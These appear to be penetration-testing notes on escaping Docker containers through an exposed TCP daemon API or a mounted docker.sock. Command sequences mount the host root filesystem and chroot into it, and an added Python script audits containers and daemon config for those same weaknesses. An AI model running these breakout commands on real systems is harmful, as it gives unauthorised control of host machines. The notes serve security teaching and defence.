Docker Breakouts
Misconfigured Docker Socket
//The Docker daemon is configured to listen on ports 2375 and 2376 (encrypted) for API requests
netstat -tlp
//Verify that the daemon is running; the command below shows Docker version info
curl localhost:2375/version | python3 -m json.tool
//Configure docker client to use the TCP Socket
export DOCKER_HOST="tcp://localhost:2375"
//now you can list docker images
docker images
//Mount the root filesystem of the host machine on the /host directory of the container.
//The image is given as repository:tag (here repository ubuntu, tag 18.04).
docker run -it -v /:/host/ ubuntu:18.04 bash
//change to /host dir to list files
cd /host/
ls -l
//Use chroot on the /host directory.
chroot ./ bash
//You have now broken out of the container and can execute commands on the host
ps -eaf
find / -name searchquery 2>/dev/null
Mounted Docker Socket
//Search for the Docker socket.
find / -name docker.sock 2>/dev/null
//By default the docker client is configured to use the /var/run/docker.sock unix socket, which is a symlink to /run/docker.sock.
//now you can list docker images
docker images
//Mount the root filesystem of the host machine on the /host directory of the container.
//The image is given as repository:tag (here repository ubuntu, tag 18.04).
docker run -it -v /:/host/ ubuntu:18.04 bash
//change to /host dir to list files
cd /host/
ls -l
//Use chroot on the /host directory.
chroot ./ bash
//You have now broken out of the container and can execute commands on the host
ps -eaf
find / -name searchquery 2>/dev/null
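//Added example (not part of the original notes): a defender-side audit for the conditions both sections above rely on, namely a TCP API listener without client-certificate verification, a bind-mounted docker.sock, and a bind mount of the host root. It assumes the daemon is configured through daemon.json and that container data comes from `docker inspect`; the sample data and the function names audit_containers and audit_daemon are constructed for illustration.

```python
import json
import posixpath

# Constructed sample of `docker inspect` output (not from the original page).
SAMPLE_INSPECT = json.loads("""[
 {"Name": "/web", "HostConfig": {"Privileged": false},
  "Mounts": [{"Type": "bind", "Source": "/srv/www", "Destination": "/var/www"}]},
 {"Name": "/ci-agent", "HostConfig": {"Privileged": false},
  "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
              "Destination": "/var/run/docker.sock"}]},
 {"Name": "/debug", "HostConfig": {"Privileged": true},
  "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host"}]}
]""")
# Constructed daemon.json contents: plain TCP listener, no TLS verification.
SAMPLE_DAEMON = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}


def audit_containers(containers):
    """Return {container name: [findings]} for the risky settings in these notes."""
    report = {}
    for c in containers:
        findings = []
        if c.get("HostConfig", {}).get("Privileged"):
            findings.append("privileged")
        for m in c.get("Mounts") or []:
            if m.get("Type") != "bind":
                continue
            src = posixpath.normpath(m.get("Source", ""))
            if src == "/":
                findings.append("host-root-mounted")
            elif posixpath.basename(src) == "docker.sock":
                findings.append("docker-socket-mounted")
        if findings:
            report[c["Name"].lstrip("/")] = findings
    return report


def audit_daemon(cfg):
    """Return TCP listeners from daemon.json that lack client-certificate checks."""
    if cfg.get("tlsverify"):
        return []
    return [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]


if __name__ == "__main__":
    print(audit_containers(SAMPLE_INSPECT))
    print(audit_daemon(SAMPLE_DAEMON))
```

//On a real host, feed audit_containers the parsed JSON from `docker inspect` for the running containers instead of the constructed sample.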
Privileged Container